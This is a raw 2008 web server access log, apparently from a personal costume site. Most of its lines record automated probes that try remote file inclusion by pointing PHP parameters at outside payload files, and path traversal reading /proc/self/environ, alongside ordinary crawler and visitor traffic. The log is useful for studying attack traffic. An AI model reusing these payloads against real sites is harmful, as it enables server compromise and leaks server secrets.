66.197.201.69 - - [03/Nov/2008:02:52:25 -0600] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://igamevillage.com//ray/modules/global/id.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:02:52:25 -0600] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://igamevillage.com//ray/modules/global/id.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:02:52:31 -0600] "GET /logs/access_log.1215302400//PhpLinkExchange/bits_listings.php?svr_rootP=http://igamevillage.com//ray/modules/global/id.txt?%0D?? HTTP/1.1" 404 345 "-""libwww-perl/5.65"
89.218.85.18 - - [03/Nov/2008:02:53:09 -0600] "GET /logs/access_log.1216425600//admin/business_inc/saveserver.php?thisdir=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:02:53:09 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:02:53:09 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
66.40.52.30 - - [03/Nov/2008:02:54:03 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:02:54:03 -0600] "GET /logs/access_log.1216425600//admin/business_inc/saveserver.php?thisdir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:02:54:03 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:02:54:13 -0600] "GET /logs/access_log.1216425600//admin/business_inc/saveserver.php?thisdir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:02:54:13 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.800"
66.40.52.30 - - [03/Nov/2008:02:54:13 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.manifestotrl.org/v6.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.800"
65.254.32.66 - - [03/Nov/2008:02:54:19 -0600] "GET /logs/index.php?link=http://hcsii.com/404.php/gid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
65.254.32.66 - - [03/Nov/2008:02:54:19 -0600] "GET /index.php?link=http://hcsii.com/404.php/gid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
59.125.96.13 - - [03/Nov/2008:02:55:01 -0600] "GET /logs/index.php?link=http://maurinho.t35.com/idr0x.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
59.125.96.13 - - [03/Nov/2008:02:55:06 -0600] "GET /index.php?link=http://maurinho.t35.com/idr0x.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
216.193.210.232 - - [03/Nov/2008:02:55:08 -0600] "GET /logs/index.php?link=http://hcsii.com/404.php/gid.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.814"
216.193.210.232 - - [03/Nov/2008:02:55:08 -0600] "GET /index.php?link=http://hcsii.com/404.php/gid.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.814"
222.236.44.26 - - [03/Nov/2008:02:55:09 -0600] "GET /logs/access_log.1216339200/index.php?link=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.236.44.26 - - [03/Nov/2008:02:55:09 -0600] "GET /index.php?link=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.236.44.26 - - [03/Nov/2008:02:55:09 -0600] "GET /logs/index.php?link=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.236.44.26 - - [03/Nov/2008:02:55:09 -0600] "GET /logs/access_log.1215993600/index.php?link=http://www.graynwhite.com/phpauction/data/file/idfeelcomz.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
207.150.183.60 - - [03/Nov/2008:02:55:49 -0600] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:02:55:50 -0600] "GET /logs/access_log.1216425600//admin/business_inc/saveserver.php?thisdir=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
207.150.183.60 - - [03/Nov/2008:02:55:50 -0600] "GET //admin/business_inc/saveserver.php?thisdir=http://shemouth.nimunet.com/irc/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
94.23.0.147 - - [03/Nov/2008:02:57:09 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [03/Nov/2008:02:57:10 -0600] "GET /logs//?index.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 105506 "-""XXXXXX"
94.23.0.147 - - [03/Nov/2008:02:57:10 -0600] "GET /logs//?index.php?mosConfig_absolute_path=http://clusty.com/search??? HTTP/1.1" 200 105506 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [03/Nov/2008:02:57:11 -0600] "GET /logs//?index.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 105506 "-""XXXXXX"
94.23.0.147 - - [03/Nov/2008:02:57:11 -0600] "GET //?index.php?mosConfig_absolute_path=http://clusty.com/search??? HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [03/Nov/2008:02:57:11 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
94.23.0.147 - - [03/Nov/2008:02:57:11 -0600] "GET //?index.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 200 1243 "-""XXXXXX"
94.23.0.147 - - [03/Nov/2008:02:57:11 -0600] "GET //?index.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1243 "-""XXXXXX"
70.38.38.230 - - [03/Nov/2008:02:59:25 -0600] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.814"
70.38.38.230 - - [03/Nov/2008:02:59:25 -0600] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.814"
87.106.16.18 - - [03/Nov/2008:03:01:58 -0600] "GET //vbgsitemap/vbgsitemap-config.php?base=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 317 "-""libwww-perl/5.803"
87.106.16.18 - - [03/Nov/2008:03:01:58 -0600] "GET /logs//vbgsitemap/vbgsitemap-config.php?base=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
65.55.208.132 - - [03/Nov/2008:03:03:01 -0600] "GET /logs/access_log.1198108800 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [03/Nov/2008:03:03:01 -0600] "GET /logs/access_log.1199318400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [03/Nov/2008:03:03:02 -0600] "GET /logs/access_log.1172275200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
64.38.4.3 - - [03/Nov/2008:03:05:47 -0600] "GET //tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.810"
64.38.4.3 - - [03/Nov/2008:03:05:47 -0600] "GET /logs/access_log.1209427200//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
64.38.4.3 - - [03/Nov/2008:03:05:47 -0600] "GET /logs//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.810"
64.38.4.3 - - [03/Nov/2008:03:05:51 -0600] "GET /logs/access_log.1196380800//tiny_includes/config.php?dir_ws=http://bghk.net/ppb2/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.810"
198.65.247.14 - - [03/Nov/2008:03:10:39 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
198.65.247.14 - - [03/Nov/2008:03:10:39 -0600] "GET /logs/access_log.1218067200//poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
198.65.247.14 - - [03/Nov/2008:03:10:39 -0600] "GET //poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
88.84.145.169 - - [03/Nov/2008:03:10:45 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
88.84.145.169 - - [03/Nov/2008:03:10:45 -0600] "GET //poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
87.106.16.18 - - [03/Nov/2008:03:11:02 -0600] "GET /logs//vbgsitemap/vbgsitemap-config.php?base=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
87.106.16.18 - - [03/Nov/2008:03:11:02 -0600] "GET /logs/access_log.1217721600//vbgsitemap/vbgsitemap-config.php?base=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
87.106.16.18 - - [03/Nov/2008:03:11:03 -0600] "GET /logs/access_log.1218758400//vbgsitemap/vbgsitemap-config.php?base=http://www.aseanplaza.com/copyright.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
198.65.247.14 - - [03/Nov/2008:03:11:03 -0600] "GET /logs/access_log.1216252800//poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
210.219.173.249 - - [03/Nov/2008:03:11:15 -0600] "GET /logs/access_log.1217721600//vbgsitemap/vbgsitemap-config.php?base=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.219.173.249 - - [03/Nov/2008:03:11:15 -0600] "GET /logs//vbgsitemap/vbgsitemap-config.php?base=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
210.219.173.249 - - [03/Nov/2008:03:11:15 -0600] "GET /logs/access_log.1218758400//vbgsitemap/vbgsitemap-config.php?base=http://www.tongso.com/tongso/copyright.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
198.65.247.14 - - [03/Nov/2008:03:11:38 -0600] "GET //poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
198.65.247.14 - - [03/Nov/2008:03:11:38 -0600] "GET /logs/access_log.1218067200//poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
198.65.247.14 - - [03/Nov/2008:03:11:38 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
198.65.247.14 - - [03/Nov/2008:03:11:43 -0600] "GET /logs/access_log.1216252800//poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idfeel.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
70.38.38.230 - - [03/Nov/2008:03:11:44 -0600] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.814"
70.38.38.230 - - [03/Nov/2008:03:11:44 -0600] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.814"
198.173.255.20 - - [03/Nov/2008:03:12:16 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.65"
198.173.255.20 - - [03/Nov/2008:03:12:16 -0600] "GET //poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.65"
216.139.67.116 - - [03/Nov/2008:03:14:28 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.64"
216.139.67.116 - - [03/Nov/2008:03:14:28 -0600] "GET //poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.64"
209.59.143.94 - - [03/Nov/2008:03:15:34 -0600] "GET //poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.811"
209.59.143.94 - - [03/Nov/2008:03:15:34 -0600] "GET /logs//poll/poll_ssi.php?include_path=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.811"
66.197.201.69 - - [03/Nov/2008:03:20:51 -0600] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://igamevillage.com//ray/modules/global/id.txt?%0D?? HTTP/1.1" 404 327 "-""libwww-perl/5.65"
66.197.201.69 - - [03/Nov/2008:03:20:52 -0600] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://igamevillage.com//ray/modules/global/id.txt?%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.65"
65.55.104.156 - - [03/Nov/2008:03:21:34 -0600] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.104.156 - - [03/Nov/2008:03:21:35 -0600] "GET /costume/costume1.htm HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
62.87.154.41 - - [03/Nov/2008:03:22:59 -0600] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://marcaquindio.com/templates/plattform/gizmo.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
89.218.85.18 - - [03/Nov/2008:03:26:46 -0600] "GET /logs/index.php?link=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
89.218.85.18 - - [03/Nov/2008:03:26:46 -0600] "GET /index.php?link=http://www.manifestotrl.org/perkosa.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
216.139.67.116 - - [03/Nov/2008:03:28:35 -0600] "GET /index.php?link=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.64"
216.139.67.116 - - [03/Nov/2008:03:28:35 -0600] "GET /logs/index.php?link=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.64"
209.59.143.94 - - [03/Nov/2008:03:28:56 -0600] "GET /logs/index.php?link=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.811"
209.59.143.94 - - [03/Nov/2008:03:28:56 -0600] "GET /index.php?link=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.811"
88.84.145.169 - - [03/Nov/2008:03:29:00 -0600] "GET /logs/index.php?link=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
88.84.145.169 - - [03/Nov/2008:03:29:00 -0600] "GET /index.php?link=http://www.pnladistancia.com.ar/vnc/idv6.txt??? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
74.6.18.228 - - [03/Nov/2008:03:29:45 -0600] "GET /logs/access_log.1217894400 HTTP/1.0" 200 589824 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
88.84.157.127 - - [03/Nov/2008:03:30:08 -0600] "GET /logs/phphtml.php?htmlclass_path=http://clusty.com/search??? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:03:30:08 -0600] "GET /logs/errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 299 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:03:30:08 -0600] "GET /logs/phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 300 "-""XXXXXX"
88.84.157.127 - - [03/Nov/2008:03:30:09 -0600] "GET /logs/phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""XXXXXX"
88.84.157.127 - - [03/Nov/2008:03:30:09 -0600] "GET /phphtml.php?htmlclass_path=http://clusty.com/search??? HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:03:30:09 -0600] "GET /phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 295 "-""XXXXXX"
88.84.157.127 - - [03/Nov/2008:03:30:09 -0600] "GET /errors.php?error=http://clusty.com/search??? HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
88.84.157.127 - - [03/Nov/2008:03:30:09 -0600] "GET /phphtml.php?htmlclass_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""XXXXXX"
79.78.54.119 - - [03/Nov/2008:03:30:28 -0600] "GET /costume/ HTTP/1.1" 200 640 "http://en.wikipedia.org/wiki/Costumes""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:28 -0600] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:31 -0600] "GET /costume/costume1.htm HTTP/1.1" 200 4913 "http://tomdolan.pconline.com/costume/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:31 -0600] "GET /costume/enter1.gif HTTP/1.1" 200 22826 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:32 -0600] "GET /costume/costm_a.JPG HTTP/1.1" 200 61141 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:32 -0600] "GET /costume/history5.gif HTTP/1.1" 200 4380 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:45 -0600] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "http://tomdolan.pconline.com/costume/costume1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:52 -0600] "GET /costume/thmb1.htm HTTP/1.1" 200 3799 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:52 -0600] "GET /costume/costm1.jpg HTTP/1.1" 200 59753 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:53 -0600] "GET /costume/costm3.jpg HTTP/1.1" 200 39529 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:53 -0600] "GET /costume/costm2.jpg HTTP/1.1" 200 36199 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:53 -0600] "GET /costume/costm4.jpg HTTP/1.1" 200 36814 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:53 -0600] "GET /costume/costm5.jpg HTTP/1.1" 200 36546 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:54 -0600] "GET /costume/costm6.jpg HTTP/1.1" 200 39194 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:54 -0600] "GET /costume/costm7.jpg HTTP/1.1" 200 35141 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:54 -0600] "GET /costume/costm8.jpg HTTP/1.1" 200 35448 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:55 -0600] "GET /costume/costm9.jpg HTTP/1.1" 200 38021 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:55 -0600] "GET /costume/costm10.jpg HTTP/1.1" 200 60187 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:55 -0600] "GET /costume/costm12.jpg HTTP/1.1" 200 35291 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
79.78.54.119 - - [03/Nov/2008:03:30:56 -0600] "GET /costume/costm11.jpg HTTP/1.1" 200 37363 "http://tomdolan.pconline.com/costume/thmb1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506; InfoPath.2)"
203.146.26.91 - - [03/Nov/2008:03:37:10 -0600] "GET //s_loadonv.inc.php?DOKUMENT_ROOT=http://www.dumkerng.com/eshop/id.txt?????? HTTP/1.1" 404 302 "-""libwww-perl/5.79"
203.146.26.91 - - [03/Nov/2008:03:37:10 -0600] "GET /logs//s_loadonv.inc.php?DOKUMENT_ROOT=http://www.dumkerng.com/eshop/id.txt?????? HTTP/1.1" 404 307 "-""libwww-perl/5.79"
59.106.19.213 - - [03/Nov/2008:03:41:24 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://not-network.com/idscan9?? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
59.106.19.213 - - [03/Nov/2008:03:41:25 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://not-network.com/idscan9?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
59.106.19.213 - - [03/Nov/2008:03:41:28 -0600] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://not-network.com/idscan9?? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
59.106.19.213 - - [03/Nov/2008:03:41:29 -0600] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://not-network.com/idscan9?? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
213.251.154.174 - - [03/Nov/2008:03:41:36 -0600] "GET //?path%5Bdocroot%5D=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
213.251.154.174 - - [03/Nov/2008:03:41:36 -0600] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
213.251.154.174 - - [03/Nov/2008:03:41:42 -0600] "GET /logs//?path%5Bdocroot%5D=http://www.kampeermarkt.com/banner/idv6.txt???? HTTP/1.1" 200 36689 "-""libwww-perl/5.805"
